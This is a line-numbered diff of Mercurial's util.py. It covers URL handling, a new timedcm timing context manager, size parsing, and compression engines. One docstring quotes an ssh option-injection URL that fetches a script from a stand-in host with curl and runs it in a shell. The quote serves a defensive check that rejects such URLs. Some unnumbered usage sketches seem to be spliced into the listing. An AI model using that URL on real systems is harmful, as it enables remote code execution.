2650 2653 if len(parts) > 1:
2651 2654 self.host, path = parts
2652 2655 else:
2653 2656 self.host = parts[0]
2654 2657 path = None
2655 2658 if not self.host:
2656 2659 self.host = None
2657 2660 # path of file:///d is /d
2658 2661 # path of file:///d:/ is d:/, not /d:/
2659 2662 if path and not hasdriveletter(path):
2660 2663 path = '/' + path
2661 2664
2662 2665 if self.host and '@' in self.host:
2663 2666 self.user, self.host = self.host.rsplit('@', 1)
2664 2667 if ':' in self.user:
2665 2668 self.user, self.passwd = self.user.split(':', 1)
2666 2669 if not self.host:
2667 2670 self.host = None
2668 2671
2669 2672 # Don't split on colons in IPv6 addresses without ports
2670 2673 if (self.host and ':' in self.host and
2671 2674 not (self.host.startswith('[') and self.host.endswith(']'))):
2672 2675 self._hostport = self.host
2673 2676 self.host, self.port = self.host.rsplit(':', 1)
2674 2677 if not self.host:
2675 2678 self.host = None
2676 2679
2677 2680 if (self.host and self.scheme == 'file' and
2678 2681 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2679 2682 raise error.Abort(_('file:// URLs can only refer to localhost'))
2680 2683
2681 2684 self.path = path
2682 2685
2683 2686 # leave the query string escaped
2684 2687 for a in ('user', 'passwd', 'host', 'port',
2685 2688 'path', 'fragment'):
2686 2689 v = getattr(self, a)
2687 2690 if v is not None:
2688 2691 setattr(self, a, urlreq.unquote(v))
2689 2692
2690 2693 @encoding.strmethod
2691 2694 def __repr__(self):
2692 2695 attrs = []
2693 2696 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2694 2697 'query', 'fragment'):
2695 2698 v = getattr(self, a)
2696 2699 if v is not None:
2697 2700 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2698 2701 return '<url %s>' % ', '.join(attrs)
2699 2702
2700 2703 def __bytes__(self):
2701 2704 r"""Join the URL's components back into a URL string.
2702 2705
2703 2706 Examples:
2704 2707
2705 2708 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2706 2709 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2707 2710 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2708 2711 'http://user:pw@host:80/?foo=bar&baz=42'
2709 2712 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2710 2713 'http://user:pw@host:80/?foo=bar%3dbaz'
2711 2714 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2712 2715 'ssh://user:pw@[::1]:2200//home/joe#'
2713 2716 >>> bytes(url(b'http://localhost:80//'))
2714 2717 'http://localhost:80//'
2715 2718 >>> bytes(url(b'http://localhost:80/'))
2716 2719 'http://localhost:80/'
2717 2720 >>> bytes(url(b'http://localhost:80'))
2718 2721 'http://localhost:80/'
2719 2722 >>> bytes(url(b'bundle:foo'))
2720 2723 'bundle:foo'
2721 2724 >>> bytes(url(b'bundle://../foo'))
2722 2725 'bundle:../foo'
2723 2726 >>> bytes(url(b'path'))
2724 2727 'path'
2725 2728 >>> bytes(url(b'file:///tmp/foo/bar'))
2726 2729 'file:///tmp/foo/bar'
2727 2730 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2728 2731 'file:///c:/tmp/foo/bar'
2729 2732 >>> print(url(br'bundle:foo\bar'))
2730 2733 bundle:foo\bar
2731 2734 >>> print(url(br'file:///D:\data\hg'))
2732 2735 file:///D:\data\hg
2733 2736 """
2734 2737 if self._localpath:
2735 2738 s = self.path
2736 2739 if self.scheme == 'bundle':
2737 2740 s = 'bundle:' + s
2738 2741 if self.fragment:
2739 2742 s += '#' + self.fragment
2740 2743 return s
2741 2744
2742 2745 s = self.scheme + ':'
2743 2746 if self.user or self.passwd or self.host:
2744 2747 s += '//'
2745 2748 elif self.scheme and (not self.path or self.path.startswith('/')
2746 2749 or hasdriveletter(self.path)):
2747 2750 s += '//'
2748 2751 if hasdriveletter(self.path):
2749 2752 s += '/'
2750 2753 if self.user:
2751 2754 s += urlreq.quote(self.user, safe=self._safechars)
2752 2755 if self.passwd:
2753 2756 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2754 2757 if self.user or self.passwd:
2755 2758 s += '@'
2756 2759 if self.host:
2757 2760 if not (self.host.startswith('[') and self.host.endswith(']')):
2758 2761 s += urlreq.quote(self.host)
2759 2762 else:
2760 2763 s += self.host
2761 2764 if self.port:
2762 2765 s += ':' + urlreq.quote(self.port)
2763 2766 if self.host:
2764 2767 s += '/'
2765 2768 if self.path:
2766 2769 # TODO: similar to the query string, we should not unescape the
2767 2770 # path when we store it; the path might contain '%2f' = '/',
2768 2771 # which we should *not* escape.
2769 2772 s += urlreq.quote(self.path, safe=self._safepchars)
2770 2773 if self.query:
2771 2774 # we store the query in escaped form.
2772 2775 s += '?' + self.query
2773 2776 if self.fragment is not None:
2774 2777 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2775 2778 return s
2776 2779
2777 2780 __str__ = encoding.strmethod(__bytes__)
2778 2781
2779 2782 def authinfo(self):
2780 2783 user, passwd = self.user, self.passwd
2781 2784 try:
2782 2785 self.user, self.passwd = None, None
2783 2786 s = bytes(self)
2784 2787 finally:
2785 2788 self.user, self.passwd = user, passwd
2786 2789 if not self.user:
2787 2790 return (s, None)
2788 2791 # authinfo[1] is passed to urllib2 password manager, and its
2789 2792 # URIs must not contain credentials. The host is passed in the
2790 2793 # URIs list because Python < 2.4.3 uses only that to search for
2791 2794 # a password.
2792 2795 return (s, (None, (s, self.host),
2793 2796 self.user, self.passwd or ''))
2794 2797
2795 2798 def isabs(self):
2796 2799 if self.scheme and self.scheme != 'file':
2797 2800 return True # remote URL
2798 2801 if hasdriveletter(self.path):
2799 2802 return True # absolute for our purposes - can't be joined()
2800 2803 if self.path.startswith(br'\\'):
2801 2804 return True # Windows UNC path
2802 2805 if self.path.startswith('/'):
2803 2806 return True # POSIX-style
2804 2807 return False
2805 2808
2806 2809 def localpath(self):
2807 2810 if self.scheme == 'file' or self.scheme == 'bundle':
2808 2811 path = self.path or '/'
2809 2812 # For Windows, we need to promote hosts containing drive
2810 2813 # letters to paths with drive letters.
2811 2814 if hasdriveletter(self._hostport):
2812 2815 path = self._hostport + '/' + self.path
2813 2816 elif (self.host is not None and self.path
2814 2817 and not hasdriveletter(path)):
2815 2818 path = '/' + path
2816 2819 return path
2817 2820 return self._origpath
2818 2821
2819 2822 def islocal(self):
2820 2823 '''whether localpath will return something that posixfile can open'''
2821 2824 return (not self.scheme or self.scheme == 'file'
2822 2825 or self.scheme == 'bundle')
2823 2826
2824 2827 def hasscheme(path):
2825 2828 return bool(url(path).scheme)
2826 2829
2827 2830 def hasdriveletter(path):
2828 2831 return path and path[1:2] == ':' and path[0:1].isalpha()
2829 2832
2830 2833 def urllocalpath(path):
2831 2834 return url(path, parsequery=False, parsefragment=False).localpath()
2832 2835
2833 2836 def checksafessh(path):
2834 2837 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2835 2838
2836 2839 This is a sanity check for ssh urls. ssh will parse the first item as
2837 2840 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2838 2841 Let's reject these potentially exploitable urls entirely and warn the
2839 2842 user.
2840 2843
2841 2844 Raises an error.Abort when the url is unsafe.
2842 2845 """
2843 2846 path = urlreq.unquote(path)
2844 2847 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2845 2848 raise error.Abort(_('potentially unsafe url: %r') %
2846 2849 (pycompat.bytestr(path),))
2847 2850
2848 2851 def hidepassword(u):
2849 2852 '''hide user credential in a url string'''
2850 2853 u = url(u)
2851 2854 if u.passwd:
2852 2855 u.passwd = '***'
2853 2856 return bytes(u)
2854 2857
2855 2858 def removeauth(u):
2856 2859 '''remove all authentication information from a url string'''
2857 2860 u = url(u)
2858 2861 u.user = u.passwd = None
2859 2862 return bytes(u)
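# Behavior sketch (outputs inferred from the url class above):
#   hidepassword(b'http://joe:secret@host/repo') -> 'http://joe:***@host/repo'
#   removeauth(b'http://joe:secret@host/repo')   -> 'http://host/repo'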
2860 2863
2861 2864 timecount = unitcountfn(
2862 2865 (1, 1e3, _('%.0f s')),
2863 2866 (100, 1, _('%.1f s')),
2864 2867 (10, 1, _('%.2f s')),
2865 2868 (1, 1, _('%.3f s')),
2866 2869 (100, 0.001, _('%.1f ms')),
2867 2870 (10, 0.001, _('%.2f ms')),
2868 2871 (1, 0.001, _('%.3f ms')),
2869 2872 (100, 0.000001, _('%.1f us')),
2870 2873 (10, 0.000001, _('%.2f us')),
2871 2874 (1, 0.000001, _('%.3f us')),
2872 2875 (100, 0.000000001, _('%.1f ns')),
2873 2876 (10, 0.000000001, _('%.2f ns')),
2874 2877 (1, 0.000000001, _('%.3f ns')),
2875 2878 )
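# Illustrative values (same unitcountfn mechanics as bytecount, shown as
# native strings):
#   timecount(12.34)   -> '12.34 s'
#   timecount(0.005)   -> '5.000 ms'
#   timecount(2.5e-07) -> '250.0 ns'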
2876 2879
2877 _timenesting = [0]
2880 @attr.s
2881 class timedcmstats(object):
2882 """Stats information produced by the timedcm context manager on entering."""
2883
2884 # the starting value of the timer as a float (meaning and resolution are
2885 # platform dependent, see util.timer)
2886 start = attr.ib(default=attr.Factory(lambda: timer()))
2887 # the elapsed time in seconds as a floating point value; starts at 0 and is
2888 # updated when the context exits.
2889 elapsed = attr.ib(default=0)
2890 # the number of nested timedcm context managers.
2891 level = attr.ib(default=1)
2892
2893 def __str__(self):
2894 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2895
2896 @contextlib.contextmanager
2897 def timedcm():
2898 """A context manager that produces timing information for a given context.
2899
2900 On entering, a timedcmstats instance is produced.
2901
2902 This context manager is reentrant.
2903
2904 """
2905 # track nested context managers
2906 timedcm._nested += 1
2907 timing_stats = timedcmstats(level=timedcm._nested)
2908 try:
2909 yield timing_stats
2910 finally:
2911 timing_stats.elapsed = timer() - timing_stats.start
2912 timedcm._nested -= 1
2913
2914 timedcm._nested = 0
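# Usage sketch (mirrors the new unit tests): stats are available on entry,
# elapsed is filled in on exit, and level records the nesting depth.
#
#     with timedcm() as outer:
#         with timedcm() as inner:
#             pass
#     # outer.level == 1, inner.level == 2, both .elapsed now set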
2878 2915
2879 2916 def timed(func):
2880 2917 '''Report the execution time of a function call to stderr.
2881 2918
2882 2919 During development, use as a decorator when you need to measure
2883 2920 the cost of a function, e.g. as follows:
2884 2921
2885 2922 @util.timed
2886 2923 def foo(a, b, c):
2887 2924 pass
2888 2925 '''
2889 2926
2890 2927 def wrapper(*args, **kwargs):
2891 start = timer()
2892 indent = 2
2893 _timenesting[0] += indent
2894 try:
2895 return func(*args, **kwargs)
2896 finally:
2897 elapsed = timer() - start
2898 _timenesting[0] -= indent
2928 with timedcm() as time_stats:
2929 result = func(*args, **kwargs)
2899 2930 stderr = procutil.stderr
2900 stderr.write('%s%s: %s\n' %
2901 (' ' * _timenesting[0], func.__name__,
2902 timecount(elapsed)))
2931 stderr.write('%s%s: %s\n' % (
2932 ' ' * time_stats.level * 2, func.__name__, time_stats))
2933 return result
2903 2934 return wrapper
2904 2935
2905 2936 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2906 2937 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2907 2938
2908 2939 def sizetoint(s):
2909 2940 '''Convert a size specifier to a byte count.
2910 2941
2911 2942 >>> sizetoint(b'30')
2912 2943 30
2913 2944 >>> sizetoint(b'2.2kb')
2914 2945 2252
2915 2946 >>> sizetoint(b'6M')
2916 2947 6291456
2917 2948 '''
2918 2949 t = s.strip().lower()
2919 2950 try:
2920 2951 for k, u in _sizeunits:
2921 2952 if t.endswith(k):
2922 2953 return int(float(t[:-len(k)]) * u)
2923 2954 return int(t)
2924 2955 except ValueError:
2925 2956 raise error.ParseError(_("couldn't parse size: %s") % s)
2926 2957
2927 2958 class hooks(object):
2928 2959 '''A collection of hook functions that can be used to extend a
2929 2960 function's behavior. Hooks are called in lexicographic order,
2930 2961 based on the names of their sources.'''
2931 2962
2932 2963 def __init__(self):
2933 2964 self._hooks = []
2934 2965
2935 2966 def add(self, source, hook):
2936 2967 self._hooks.append((source, hook))
2937 2968
2938 2969 def __call__(self, *args):
2939 2970 self._hooks.sort(key=lambda x: x[0])
2940 2971 results = []
2941 2972 for source, hook in self._hooks:
2942 2973 results.append(hook(*args))
2943 2974 return results
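# Usage sketch (hypothetical source names): hooks run sorted by source, and
# calling the collection returns every hook's result in that order.
h = hooks()
h.add('zzz-late', lambda x: x + 1)
h.add('aaa-early', lambda x: x * 2)
assert h(3) == [6, 4]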
2944 2975
2945 2976 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2946 2977 '''Yields lines for a nicely formatted stacktrace.
2947 2978 Skips the 'skip' last entries, then returns the last 'depth' entries.
2948 2979 Each file+linenumber is formatted according to fileline.
2949 2980 Each line is formatted according to line.
2950 2981 If line is None, it yields:
2951 2982 length of longest filepath+line number,
2952 2983 filepath+linenumber,
2953 2984 function
2954 2985
2955 2986 Not to be used in production code, but very convenient while developing.
2956 2987 '''
2957 2988 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2958 2989 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2959 2990 ][-depth:]
2960 2991 if entries:
2961 2992 fnmax = max(len(entry[0]) for entry in entries)
2962 2993 for fnln, func in entries:
2963 2994 if line is None:
2964 2995 yield (fnmax, fnln, func)
2965 2996 else:
2966 2997 yield line % (fnmax, fnln, func)
2967 2998
2968 2999 def debugstacktrace(msg='stacktrace', skip=0,
2969 3000 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2970 3001 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2971 3002 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
2972 3003 By default it will flush stdout first.
2973 3004 It can be used everywhere and intentionally does not require an ui object.
2974 3005 Not to be used in production code, but very convenient while developing.
2975 3006 '''
2976 3007 if otherf:
2977 3008 otherf.flush()
2978 3009 f.write('%s at:\n' % msg.rstrip())
2979 3010 for line in getstackframes(skip + 1, depth=depth):
2980 3011 f.write(line)
2981 3012 f.flush()
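# Usage sketch: while developing, drop a call such as
#
#     debugstacktrace(b'who calls me?', depth=5)
#
# at a suspicious call site to dump the five innermost frames to stderr
# (the `dst` alias defined near the end of this module is the usual
# shorthand).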
2982 3013
2983 3014 class dirs(object):
2984 3015 '''a multiset of directory names from a dirstate or manifest'''
2985 3016
2986 3017 def __init__(self, map, skip=None):
2987 3018 self._dirs = {}
2988 3019 addpath = self.addpath
2989 3020 if safehasattr(map, 'iteritems') and skip is not None:
2990 3021 for f, s in map.iteritems():
2991 3022 if s[0] != skip:
2992 3023 addpath(f)
2993 3024 else:
2994 3025 for f in map:
2995 3026 addpath(f)
2996 3027
2997 3028 def addpath(self, path):
2998 3029 dirs = self._dirs
2999 3030 for base in finddirs(path):
3000 3031 if base in dirs:
3001 3032 dirs[base] += 1
3002 3033 return
3003 3034 dirs[base] = 1
3004 3035
3005 3036 def delpath(self, path):
3006 3037 dirs = self._dirs
3007 3038 for base in finddirs(path):
3008 3039 if dirs[base] > 1:
3009 3040 dirs[base] -= 1
3010 3041 return
3011 3042 del dirs[base]
3012 3043
3013 3044 def __iter__(self):
3014 3045 return iter(self._dirs)
3015 3046
3016 3047 def __contains__(self, d):
3017 3048 return d in self._dirs
3018 3049
3019 3050 if safehasattr(parsers, 'dirs'):
3020 3051 dirs = parsers.dirs
3021 3052
3022 3053 def finddirs(path):
3023 3054 pos = path.rfind('/')
3024 3055 while pos != -1:
3025 3056 yield path[:pos]
3026 3057 pos = path.rfind('/', 0, pos)
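# Usage sketch for the dirs multiset (str paths for readability; the C
# parsers.dirs replacement behaves the same): every ancestor directory is
# counted once per file, so membership survives until its last file goes.
d = dirs(['a/b/c', 'a/d'])
assert 'a' in d and 'a/b' in d
d.delpath('a/b/c')
assert 'a/b' not in d and 'a' in d   # 'a' still covers 'a/d'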
3027 3058
3028 3059 # compression code
3029 3060
3030 3061 SERVERROLE = 'server'
3031 3062 CLIENTROLE = 'client'
3032 3063
3033 3064 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3034 3065 (u'name', u'serverpriority',
3035 3066 u'clientpriority'))
3036 3067
3037 3068 class compressormanager(object):
3038 3069 """Holds registrations of various compression engines.
3039 3070
3040 3071 This class essentially abstracts the differences between compression
3041 3072 engines to allow new compression formats to be added easily, possibly from
3042 3073 extensions.
3043 3074
3044 3075 Compressors are registered against the global instance by calling its
3045 3076 ``register()`` method.
3046 3077 """
3047 3078 def __init__(self):
3048 3079 self._engines = {}
3049 3080 # Bundle spec human name to engine name.
3050 3081 self._bundlenames = {}
3051 3082 # Internal bundle identifier to engine name.
3052 3083 self._bundletypes = {}
3053 3084 # Revlog header to engine name.
3054 3085 self._revlogheaders = {}
3055 3086 # Wire proto identifier to engine name.
3056 3087 self._wiretypes = {}
3057 3088
3058 3089 def __getitem__(self, key):
3059 3090 return self._engines[key]
3060 3091
3061 3092 def __contains__(self, key):
3062 3093 return key in self._engines
3063 3094
3064 3095 def __iter__(self):
3065 3096 return iter(self._engines.keys())
3066 3097
3067 3098 def register(self, engine):
3068 3099 """Register a compression engine with the manager.
3069 3100
3070 3101 The argument must be a ``compressionengine`` instance.
3071 3102 """
3072 3103 if not isinstance(engine, compressionengine):
3073 3104 raise ValueError(_('argument must be a compressionengine'))
3074 3105
3075 3106 name = engine.name()
3076 3107
3077 3108 if name in self._engines:
3078 3109 raise error.Abort(_('compression engine %s already registered') %
3079 3110 name)
3080 3111
3081 3112 bundleinfo = engine.bundletype()
3082 3113 if bundleinfo:
3083 3114 bundlename, bundletype = bundleinfo
3084 3115
3085 3116 if bundlename in self._bundlenames:
3086 3117 raise error.Abort(_('bundle name %s already registered') %
3087 3118 bundlename)
3088 3119 if bundletype in self._bundletypes:
3089 3120 raise error.Abort(_('bundle type %s already registered by %s') %
3090 3121 (bundletype, self._bundletypes[bundletype]))
3091 3122
3092 3123 # No external facing name declared.
3093 3124 if bundlename:
3094 3125 self._bundlenames[bundlename] = name
3095 3126
3096 3127 self._bundletypes[bundletype] = name
3097 3128
3098 3129 wiresupport = engine.wireprotosupport()
3099 3130 if wiresupport:
3100 3131 wiretype = wiresupport.name
3101 3132 if wiretype in self._wiretypes:
3102 3133 raise error.Abort(_('wire protocol compression %s already '
3103 3134 'registered by %s') %
3104 3135 (wiretype, self._wiretypes[wiretype]))
3105 3136
3106 3137 self._wiretypes[wiretype] = name
3107 3138
3108 3139 revlogheader = engine.revlogheader()
3109 3140 if revlogheader and revlogheader in self._revlogheaders:
3110 3141 raise error.Abort(_('revlog header %s already registered by %s') %
3111 3142 (revlogheader, self._revlogheaders[revlogheader]))
3112 3143
3113 3144 if revlogheader:
3114 3145 self._revlogheaders[revlogheader] = name
3115 3146
3116 3147 self._engines[name] = engine
3117 3148
3118 3149 @property
3119 3150 def supportedbundlenames(self):
3120 3151 return set(self._bundlenames.keys())
3121 3152
3122 3153 @property
3123 3154 def supportedbundletypes(self):
3124 3155 return set(self._bundletypes.keys())
3125 3156
3126 3157 def forbundlename(self, bundlename):
3127 3158 """Obtain a compression engine registered to a bundle name.
3128 3159
3129 3160 Will raise KeyError if the bundle type isn't registered.
3130 3161
3131 3162 Will abort if the engine is known but not available.
3132 3163 """
3133 3164 engine = self._engines[self._bundlenames[bundlename]]
3134 3165 if not engine.available():
3135 3166 raise error.Abort(_('compression engine %s could not be loaded') %
3136 3167 engine.name())
3137 3168 return engine
3138 3169
3139 3170 def forbundletype(self, bundletype):
3140 3171 """Obtain a compression engine registered to a bundle type.
3141 3172
3142 3173 Will raise KeyError if the bundle type isn't registered.
3143 3174
3144 3175 Will abort if the engine is known but not available.
3145 3176 """
3146 3177 engine = self._engines[self._bundletypes[bundletype]]
3147 3178 if not engine.available():
3148 3179 raise error.Abort(_('compression engine %s could not be loaded') %
3149 3180 engine.name())
3150 3181 return engine
3151 3182
3152 3183 def supportedwireengines(self, role, onlyavailable=True):
3153 3184 """Obtain compression engines that support the wire protocol.
3154 3185
3155 3186 Returns a list of engines in prioritized order, most desired first.
3156 3187
3157 3188 If ``onlyavailable`` is set, filter out engines that can't be
3158 3189 loaded.
3159 3190 """
3160 3191 assert role in (SERVERROLE, CLIENTROLE)
3161 3192
3162 3193 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3163 3194
3164 3195 engines = [self._engines[e] for e in self._wiretypes.values()]
3165 3196 if onlyavailable:
3166 3197 engines = [e for e in engines if e.available()]
3167 3198
3168 3199 def getkey(e):
3169 3200 # Sort first by priority, highest first. In case of tie, sort
3170 3201 # alphabetically. This is arbitrary, but ensures output is
3171 3202 # stable.
3172 3203 w = e.wireprotosupport()
3173 3204 return -1 * getattr(w, attr), w.name
3174 3205
3175 3206 return list(sorted(engines, key=getkey))
3176 3207
3177 3208 def forwiretype(self, wiretype):
3178 3209 engine = self._engines[self._wiretypes[wiretype]]
3179 3210 if not engine.available():
3180 3211 raise error.Abort(_('compression engine %s could not be loaded') %
3181 3212 engine.name())
3182 3213 return engine
3183 3214
3184 3215 def forrevlogheader(self, header):
3185 3216 """Obtain a compression engine registered to a revlog header.
3186 3217
3187 3218 Will raise KeyError if the revlog header value isn't registered.
3188 3219 """
3189 3220 return self._engines[self._revlogheaders[header]]
3190 3221
3191 3222 compengines = compressormanager()
3192 3223
3193 3224 class compressionengine(object):
3194 3225 """Base class for compression engines.
3195 3226
3196 3227 Compression engines must implement the interface defined by this class.
3197 3228 """
3198 3229 def name(self):
3199 3230 """Returns the name of the compression engine.
3200 3231
3201 3232 This is the key the engine is registered under.
3202 3233
3203 3234 This method must be implemented.
3204 3235 """
3205 3236 raise NotImplementedError()
3206 3237
3207 3238 def available(self):
3208 3239 """Whether the compression engine is available.
3209 3240
3210 3241 The intent of this method is to allow optional compression engines
3211 3242 that may not be available in all installations (such as engines relying
3212 3243 on C extensions that may not be present).
3213 3244 """
3214 3245 return True
3215 3246
3216 3247 def bundletype(self):
3217 3248 """Describes bundle identifiers for this engine.
3218 3249
3219 3250 If this compression engine isn't supported for bundles, returns None.
3220 3251
3221 3252 If this engine can be used for bundles, returns a 2-tuple of strings of
3222 3253 the user-facing "bundle spec" compression name and an internal
3223 3254 identifier used to denote the compression format within bundles. To
3224 3255 exclude the name from external usage, set the first element to ``None``.
3225 3256
3226 3257 If bundle compression is supported, the class must also implement
3227 3258 ``compressstream`` and ``decompressorreader``.
3228 3259
3229 3260 The docstring of this method is used in the help system to tell users
3230 3261 about this engine.
3231 3262 """
3232 3263 return None
3233 3264
3234 3265 def wireprotosupport(self):
3235 3266 """Declare support for this compression format on the wire protocol.
3236 3267
3237 3268 If this compression engine isn't supported for compressing wire
3238 3269 protocol payloads, returns None.
3239 3270
3240 3271 Otherwise, returns ``compenginewireprotosupport`` with the following
3241 3272 fields:
3242 3273
3243 3274 * String format identifier
3244 3275 * Integer priority for the server
3245 3276 * Integer priority for the client
3246 3277
3247 3278 The integer priorities are used to order the advertisement of format
3248 3279 support by server and client. The highest integer is advertised
3249 3280 first. Integers with non-positive values aren't advertised.
3250 3281
3251 3282 The priority values are somewhat arbitrary and only used for default
3252 3283 ordering. The relative order can be changed via config options.
3253 3284
3254 3285 If wire protocol compression is supported, the class must also implement
3255 3286 ``compressstream`` and ``decompressorreader``.
3256 3287 """
3257 3288 return None
3258 3289
3259 3290 def revlogheader(self):
3260 3291 """Header added to revlog chunks that identifies this engine.
3261 3292
3262 3293 If this engine can be used to compress revlogs, this method should
3263 3294 return the bytes used to identify chunks compressed with this engine.
3264 3295 Else, the method should return ``None`` to indicate it does not
3265 3296 participate in revlog compression.
3266 3297 """
3267 3298 return None
3268 3299
3269 3300 def compressstream(self, it, opts=None):
3270 3301 """Compress an iterator of chunks.
3271 3302
3272 3303 The method receives an iterator (ideally a generator) of chunks of
3273 3304 bytes to be compressed. It returns an iterator (ideally a generator)
3274 3305 of chunks of bytes representing the compressed output.
3275 3306
3276 3307 Optionally accepts an argument defining how to perform compression.
3277 3308 Each engine treats this argument differently.
3278 3309 """
3279 3310 raise NotImplementedError()
3280 3311
3281 3312 def decompressorreader(self, fh):
3282 3313 """Perform decompression on a file object.
3283 3314
3284 3315 Argument is an object with a ``read(size)`` method that returns
3285 3316 compressed data. Return value is an object with a ``read(size)`` that
3286 3317 returns uncompressed data.
3287 3318 """
3288 3319 raise NotImplementedError()
3289 3320
3290 3321 def revlogcompressor(self, opts=None):
3291 3322 """Obtain an object that can be used to compress revlog entries.
3292 3323
3293 3324 The object has a ``compress(data)`` method that compresses binary
3294 3325 data. This method returns compressed binary data or ``None`` if
3295 3326 the data could not be compressed (too small, not compressible, etc).
3296 3327 The returned data should have a header uniquely identifying this
3297 3328 compression format so decompression can be routed to this engine.
3298 3329 This header should be identified by the ``revlogheader()`` return
3299 3330 value.
3300 3331
3301 3332 The object has a ``decompress(data)`` method that decompresses
3302 3333 data. The method will only be called if ``data`` begins with
3303 3334 ``revlogheader()``. The method should return the raw, uncompressed
3304 3335 data or raise a ``RevlogError``.
3305 3336
3306 3337 The object is reusable but is not thread safe.
3307 3338 """
3308 3339 raise NotImplementedError()
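# A minimal custom engine sketch (hypothetical 'nullwrap' engine, not part
# of this change): only name() is mandatory, and the base-class defaults
# already opt out of bundles, the wire protocol and revlogs, so a
# pass-through stream pair is enough to register.
class _nullwrapengine(compressionengine):
    def name(self):
        return 'nullwrap-sketch'

    def compressstream(self, it, opts=None):
        return it                     # chunks pass through unchanged

    def decompressorreader(self, fh):
        return fh

compengines.register(_nullwrapengine())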
3309 3340
3310 3341 class _CompressedStreamReader(object):
3311 3342 def __init__(self, fh):
3312 3343 if safehasattr(fh, 'unbufferedread'):
3313 3344 self._reader = fh.unbufferedread
3314 3345 else:
3315 3346 self._reader = fh.read
3316 3347 self._pending = []
3317 3348 self._pos = 0
3318 3349 self._eof = False
3319 3350
3320 3351 def _decompress(self, chunk):
3321 3352 raise NotImplementedError()
3322 3353
3323 3354 def read(self, l):
3324 3355 buf = []
3325 3356 while True:
3326 3357 while self._pending:
3327 3358 if len(self._pending[0]) > l + self._pos:
3328 3359 newbuf = self._pending[0]
3329 3360 buf.append(newbuf[self._pos:self._pos + l])
3330 3361 self._pos += l
3331 3362 return ''.join(buf)
3332 3363
3333 3364 newbuf = self._pending.pop(0)
3334 3365 if self._pos:
3335 3366 buf.append(newbuf[self._pos:])
3336 3367 l -= len(newbuf) - self._pos
3337 3368 else:
3338 3369 buf.append(newbuf)
3339 3370 l -= len(newbuf)
3340 3371 self._pos = 0
3341 3372
3342 3373 if self._eof:
3343 3374 return ''.join(buf)
3344 3375 chunk = self._reader(65536)
3345 3376 self._decompress(chunk)
3346 3377
3347 3378 class _GzipCompressedStreamReader(_CompressedStreamReader):
3348 3379 def __init__(self, fh):
3349 3380 super(_GzipCompressedStreamReader, self).__init__(fh)
3350 3381 self._decompobj = zlib.decompressobj()
3351 3382 def _decompress(self, chunk):
3352 3383 newbuf = self._decompobj.decompress(chunk)
3353 3384 if newbuf:
3354 3385 self._pending.append(newbuf)
3355 3386 d = self._decompobj.copy()
3356 3387 try:
3357 3388 d.decompress('x')
3358 3389 d.flush()
3359 3390 if d.unused_data == 'x':
3360 3391 self._eof = True
3361 3392 except zlib.error:
3362 3393 pass
3363 3394
3364 3395 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3365 3396 def __init__(self, fh):
3366 3397 super(_BZ2CompressedStreamReader, self).__init__(fh)
3367 3398 self._decompobj = bz2.BZ2Decompressor()
3368 3399 def _decompress(self, chunk):
3369 3400 newbuf = self._decompobj.decompress(chunk)
3370 3401 if newbuf:
3371 3402 self._pending.append(newbuf)
3372 3403 try:
3373 3404 while True:
3374 3405 newbuf = self._decompobj.decompress('')
3375 3406 if newbuf:
3376 3407 self._pending.append(newbuf)
3377 3408 else:
3378 3409 break
3379 3410 except EOFError:
3380 3411 self._eof = True
3381 3412
3382 3413 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3383 3414 def __init__(self, fh):
3384 3415 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3385 3416 newbuf = self._decompobj.decompress('BZ')
3386 3417 if newbuf:
3387 3418 self._pending.append(newbuf)
3388 3419
3389 3420 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3390 3421 def __init__(self, fh, zstd):
3391 3422 super(_ZstdCompressedStreamReader, self).__init__(fh)
3392 3423 self._zstd = zstd
3393 3424 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3394 3425 def _decompress(self, chunk):
3395 3426 newbuf = self._decompobj.decompress(chunk)
3396 3427 if newbuf:
3397 3428 self._pending.append(newbuf)
3398 3429 try:
3399 3430 while True:
3400 3431 newbuf = self._decompobj.decompress('')
3401 3432 if newbuf:
3402 3433 self._pending.append(newbuf)
3403 3434 else:
3404 3435 break
3405 3436 except self._zstd.ZstdError:
3406 3437 self._eof = True
3407 3438
3408 3439 class _zlibengine(compressionengine):
3409 3440 def name(self):
3410 3441 return 'zlib'
3411 3442
3412 3443 def bundletype(self):
3413 3444 """zlib compression using the DEFLATE algorithm.
3414 3445
3415 3446 All Mercurial clients should support this format. The compression
3416 3447 algorithm strikes a reasonable balance between compression ratio
3417 3448 and size.
3418 3449 """
3419 3450 return 'gzip', 'GZ'
3420 3451
3421 3452 def wireprotosupport(self):
3422 3453 return compewireprotosupport('zlib', 20, 20)
3423 3454
3424 3455 def revlogheader(self):
3425 3456 return 'x'
3426 3457
3427 3458 def compressstream(self, it, opts=None):
3428 3459 opts = opts or {}
3429 3460
3430 3461 z = zlib.compressobj(opts.get('level', -1))
3431 3462 for chunk in it:
